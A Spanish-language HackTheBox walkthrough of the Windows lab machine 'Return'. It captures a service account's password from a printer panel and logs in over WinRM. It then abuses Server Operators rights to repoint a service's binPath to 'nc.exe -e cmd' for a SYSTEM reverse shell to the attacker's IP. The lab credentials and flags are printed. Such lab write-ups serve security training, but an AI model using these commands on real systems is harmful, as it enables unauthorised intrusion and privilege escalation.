Return

Sobre esta maquina: HTB

Sistema Operativo: Windows

Skills Usados:

Abusing Printer
Abusing Server Operators Group
Service Configuration Manipulation

Metodologia:

Hacemos reconocimiento basico con Nmap, puertos abiertos y scripts y versiones aplicados en puertos abiertos

// 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-26 15:22 EDT
Nmap scan report for 10.10.11.108
Host is up (0.18s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl



nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268,3269

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
88/tcp   open  kerberos-sec?
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-26T19:54:32
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Realizamos una exploracion del protocolo SMB para listar recursos compartidos

// 
netexec smb 10.10.11.108

SMB         10.10.11.108    445    PRINTER          [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)

Observamos que es una impresora, ahora revisemos lo que corre por el puerto 80

nos ponemos en escucha

// 
nc -nlvp 389
listening on [any] 389 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.11.108] 57513
0*`%return\svc-printer�
1edFg43012!!

Obtenemos unas credenciales ahora podresmos probar el ingreso de las mismas por el puerto de SMB o de WINRM que ambos estan abiertos.

// 
Intentamos ver si las credenciales son validas

❯ netexec smb 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'

SMB         10.10.11.108    445    PRINTER          [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.10.11.108    445    PRINTER          [+] return.local\svc-printer:1edFg43012!! 




Probamos con wnrm para ver si es posible la ejecucion remota en windows

❯ netexec winrm 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'

WINRM       10.10.11.108    5985   PRINTER          [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
WINRM       10.10.11.108    5985   PRINTER          [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)

WinRM es Pwnable asi que lo utilizaremos para intentar ganar acceso

// 
Utilizamos evil-winrm para probar credenciales

evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
                                        
Evil-WinRM shell v3.7
                                        
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents> 



Buscamos la FLAG

*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ..

*Evil-WinRM* PS C:\Users\svc-printer> cd Desktop

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> dir


    Directory: C:\Users\svc-printer\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        4/26/2025  12:34 PM             34 user.txt

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt

a36b7a37aef598d3808d8ae5f0b1840b

Ahora intentaremos ir a USERS para observar si podemos escalar privilegios

// 
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> cd C:\users

*Evil-WinRM* PS C:\users> dir


    Directory: C:\users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/27/2021   4:40 AM                Administrator
d-r---        5/26/2021   1:50 AM                Public
d-----        5/26/2021   1:51 AM                svc-printer


*Evil-WinRM* PS C:\users> cd Administrator

*Evil-WinRM* PS C:\users\Administrator> dir


    Directory: C:\users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        5/20/2021  12:10 PM                3D Objects
d-r---        5/20/2021  12:10 PM                Contacts
d-r---        9/27/2021   4:22 AM                Desktop
d-r---        5/27/2021  12:50 AM                Documents
d-r---        5/26/2021   3:00 AM                Downloads
d-r---        5/20/2021  12:10 PM                Favorites
d-r---        5/20/2021  12:10 PM                Links
d-r---        5/20/2021  12:10 PM                Music
d-r---        5/20/2021  12:10 PM                Pictures
d-r---        5/20/2021  12:10 PM                Saved Games
d-r---        5/20/2021  12:10 PM                Searches
d-r---        5/20/2021  12:10 PM                Videos


*Evil-WinRM* PS C:\users\Administrator> cd Desktop

*Evil-WinRM* PS C:\users\Administrator\Desktop> dir


    Directory: C:\users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        4/26/2025  12:34 PM             34 root.txt





Veo el TXT de la flag pero no me deja abrirla por no tener privilegios asi que tenemos que ganar acceso total al sistema


*Evil-WinRM* PS C:\users\Administrator\Desktop> whoami /priv


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled


*Evil-WinRM* PS C:\users\Administrator\Desktop> net user svc-printer

User name                    svc-printer
Full Name                    SVCPrinter
Comment                      Service Account for Printer
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2021 1:15:13 AM
Password expires             Never
Password changeable          5/27/2021 1:15:13 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   4/26/2025 1:15:54 PM

Logon hours allowed          All

Local Group Memberships     

*Print Operators      
*Remote Management Use
*Server Operators
*Global Group memberships     
*Domain Users
*The command completed successfully.

Server operators esta activado en nuestro nivel de autenticacion lo que nos permitira detener servicios y escalar privilegios así que intentaremos crear una reverse shell subiendo un servicio para ello ubicaremos nuestro path de NC y pegaremos la dirección absoluta en la maquina victima camuflándolo como un servicio con nc.exe

Ya con el NC en el sistema victima intentamos infectarlo con una reverse Shell simulando ser un servicio existente poniéndome en escucha posteriormente paramos y arrancamos el servicio para entablar la reverse Shell.

// 
Modificamos el servicio VMTOOLS con sc.exe para que cuando se ejecute nos permita una reverse shell en nuestro sistema
 
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config VMTools binPath="C:\users\svc-printer\Desktop\nc.exe -e cmd 10.10.14.38 443"

[SC] ChangeServiceConfig SUCCESS


nc -lvnp 443

listening on [any] 443 ...

*Evil-WinRM* PS sc.exe stop VMTools

*Evil-WinRM* PS sc.exe start VMTools


nc -lvnp 443

connect to [10.10.14.38] from (UNKNOWN) [10.10.11.108] 57790
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.


C:\Windows\system32> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt

25a951805c15e0757260f46fb959f4f9

Accedimos al ROOT y obtuvimos la flag dando por terminada esta maquina.

PreviousHackTheBox NextHorizontall

Last updated 7 months ago